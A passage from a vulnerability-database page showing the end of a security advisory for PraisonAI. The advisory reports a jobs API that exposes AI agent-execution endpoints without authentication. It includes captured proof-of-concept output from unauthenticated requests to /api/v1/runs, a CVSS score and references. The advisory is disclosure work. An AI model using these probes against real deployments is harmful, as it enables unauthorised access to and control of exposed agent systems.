unauthenticated agent-execution API\")\n```\n\n## Verified result\n\nThis PoC was executed against the live upstream code; captured output:\n\n```\n[+] (no auth) GET  list    /api/v1/runs -\u003e HTTP 200\n[+] (no auth) POST submit  /api/v1/runs -\u003e HTTP 422\n[+] (no auth) GET  status  /api/v1/runs -\u003e HTTP 404\n[+] (no auth) GET  result  /api/v1/runs -\u003e HTTP 404\n[+] (no auth) POST cancel  /api/v1/runs -\u003e HTTP 404\n[+] (no auth) DEL  delete  /api/v1/runs -\u003e HTTP 404\n[+] CONFIRMED against real praisonai jobs API: list returns 200 and NO endpoint returns 401/403 \u2014 fully unauthenticated agent-execution API\n```\n\n## Credit\n\nKai Aizen \u2014 SnailSploit (@SnailSploit). Adversarial \u0026 Offensive Security Research.",
  "id": "GHSA-fq2m-6wqh-x44g",
  "modified": "2026-06-18T13:57:16Z",
  "published": "2026-06-18T13:57:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-fq2m-6wqh-x44g"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MervinPraison/PraisonAI"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PraisonAI: Jobs API exposes agent-execution endpoints with no authentication "
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…